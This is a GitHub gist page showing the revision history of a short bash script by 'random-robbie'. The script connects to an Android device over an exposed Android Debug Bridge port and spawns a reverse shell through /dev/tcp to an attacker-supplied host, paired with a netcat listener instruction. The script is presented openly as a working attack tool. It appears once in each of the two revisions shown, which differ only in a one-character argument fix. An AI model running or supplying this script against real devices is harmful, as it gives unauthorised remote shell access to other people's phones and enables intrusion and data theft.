Last active
May 5, 2024 13:40
-
-
Save random-robbie/4d6264cfadc7d716cd28ba29e424f62d to your computer and use it in GitHub Desktop.
Revisions
-
random-robbie revised this gist
Jun 9, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ #!/bin/bash # Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. # By Random_Robbie adb connect $1:5555 adb shell sh -i >& /dev/tcp/$2/4444 0>&1 echo "[*] Should have a shell now ..... Be nice :) [*]" -
random-robbie created this gist
Jun 9, 2018 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,6 @@ #!/bin/bash # Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. # By Random_Robbie adb connect $:5555 adb shell sh -i >& /dev/tcp/$2/4444 0>&1 echo "[*] Should have a shell now ..... Be nice :) [*]"